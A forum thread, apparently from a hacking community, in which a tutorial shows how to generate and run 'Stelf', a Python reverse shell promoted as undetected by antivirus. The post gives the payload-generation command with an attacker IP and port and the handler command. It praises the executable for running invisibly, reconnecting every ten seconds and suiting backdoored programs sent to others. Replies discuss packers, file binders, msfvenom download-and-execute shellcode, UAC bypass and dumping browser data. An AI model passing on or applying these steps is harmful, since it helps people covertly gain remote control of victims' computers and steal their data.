How to get a Super Stelfy Shell (that AV doesn't pick up)

malware
reverseshell
stelf

(Security Architect & Founder) #1

Getting Stealthy with Stelf

Hello 0x00’ers!

In this tutorial, I am going to be giving away some content that has been sought after for a long time. Everybody knows that most prebuilt tools such as Metasploit don’t work, payloads generated by them, or encoders used with them. They get picked up by anti-virus, they get stuck in filters, using them generally will give you a bad time no matter how many awkward tutorials you follow.

This is not because they are badly written, no, they are very good tools. The problem though lies in the fact that they are very popular. Anti-Virus packages work on blacklists, and when thousands of newbie hackers are generating payloads in the masses, they soon get added to these blacklists. Making all that hard work moot.

I am going to show you how to use literally one of the easiest tools written by @Joe_Schmoe.

Downloading Stelf

Go over to the gitlab and get a copy.

Once that’s downloaded, unzip the file and you’re ready for the next step.

Generating your Stelf Payload

python2 encode.py yourip theport outputfilename.exe

Replace these values with the ones you will need. In my case it looks like this

python2 encode.py 192.168.1.89 8080 scaryfile.exe

It will also ask you if you want to start a webserver for better sharing purposes. You can enter “y” and hit enter to do this.

Once you’ve transferred your executable wherever you may need it, start the handler and you’ll be ready to go.

Using Stelf

Fire up the handler with python2 handler.py and then just open the file.

In my case I had a shell open up before from persistence on this machine. I’ve been testing stelf on this VM before.

There’s no point me posting an image of the windows machine because nothing happens, you just click it and nothing appears to happen (it opens in the background). This behavior is nice as it will work with backdoored programs really nicely. You’ll never know it was there.

The shell will attempt a reconnection every 10 seconds. And doesn’t require any other code. It is completely self-contained. Theoretically, you could send this to somebody, never open your handler, and providing they don’t shutdown their computer to kill the process, you can open your handler any time and get a shell.

In future, it may be possible to make it run persistence when it is first opened.

Quick Stelf Commands

  • l - List sessions
  • i - Interact with sessions
  • ctrl+c - Background session

Once inside a session the ‘help’ command will show you the way. Also, remember this is a normal shell too, so typing any windows cmd command will work.

I hope this helps you out, also I hope you guys realise how powerful Stelf is. Especially since it doesn’t get picked up by any AV without even needing an encoder (encoders look fishy).

@Joe_schmoe has poured his heart and soul into this, and to just finally show it off to the world is really rewarding.

That’s all for day guys!

- pry0cc


--Forg's Wiki--
Services & Tools [Wiki]
(Community & PR manager) #2

i3 config files plz?

On-topic: thanks for the tutorial, I got a little confused by STELF at first (but I figured it out fast enough), hopefully this tutorial will clear out confusion for other people too :wink:

-Phoenix750


#3

?

100k1n9 4 r3fUd


(Security Architect & Founder) #4

I was playing with the backdoor factory. Apparently that gets picked up.


#5

If you need some help with that, you know who to talk to. :beers:

Also, cool little framework.


(Security Architect & Founder) #6

Since my host is Linux, I wanted to figure out a way to make a cross platform backdoor. I have already used your packer + your file binder. But I’ve needed my VM for that. Also, I’m having a bit of an issue with resource hacker. Get on IRC.


#7

Don’t bother using my public packer, it’s already detected like crazy.


(Security Architect & Founder) #8

So people have been jamming it in virustotal? The audience was extremely small. I am surprised as to how it’s gotten out.


#9

Don’t backdoor with the whole executable ya silly goose, use msfvenom to create download and execute shellcode (or make your own, wink wink)


(Security Architect & Founder) #10

Did you ever finish the stager functionality? I’d be interested to see that. You’ve completely left this project stagnant for ages!!! Smh

:joy: Just kidding Joe.


#11

There’s no reason to write any sort of staging code honestly, any old http server and shellcode will do


#12

Potentially dumb question, but what is the advantage of using this over Veil? If it does use some different obfuscation method, a breakdown of that would be interesting.


(Security Architect & Founder) #13
  1. Veil doesn’t work anymore, I’m not sure if you’ve had success with it, but all my experiences have been flawed.
  2. This isn’t obfuscation, this is a fresh shell, brand new (and it’s in python!), which means its cross platform.

#14

Ok, cool. Thought it worth asking before digging in too deep. Second the issues with Veil. I have had success with veil on production networks, but those returns have diminished considerably. Thanks!


#15

AWESOME WORK GUIZ!!!

Mucho kudo’s!


(Infamous Industries) #16

the super stelfy shell is a good idea is this a community project???

if so we have some suggestions.

  1. Keep the shell basic - cd/isadmin/bypassuac/download/upload/persist/help etc… Just keep the basics
  2. Put dumpchrome ff and others in there own individual files makes your job easier.
  3. Encryption???
  4. Keep up the great work. We are still programming newbs and learning heaps from the community.

(mark allen) #17

Hi phoenix750 am also a bit confuse about STELF please how did figure it out.Thanks


(mark allen) #18

hi bro am a bit confuse about the STELF please can you give me a hand,thanks


(Security Architect & Founder) #19

Well thanks to @Joe_Schmoe and his rapid refactoring skills. He is re-writing the entire shell. With cool stuff like modules and that. So in fact the gitlab link doesn’t actually work; neither do the instructions here anymore.

We’ll make an article when the new version gets released. And it works :stuck_out_tongue:


(mark allen) #20

ok thanks bro i will be waiting for it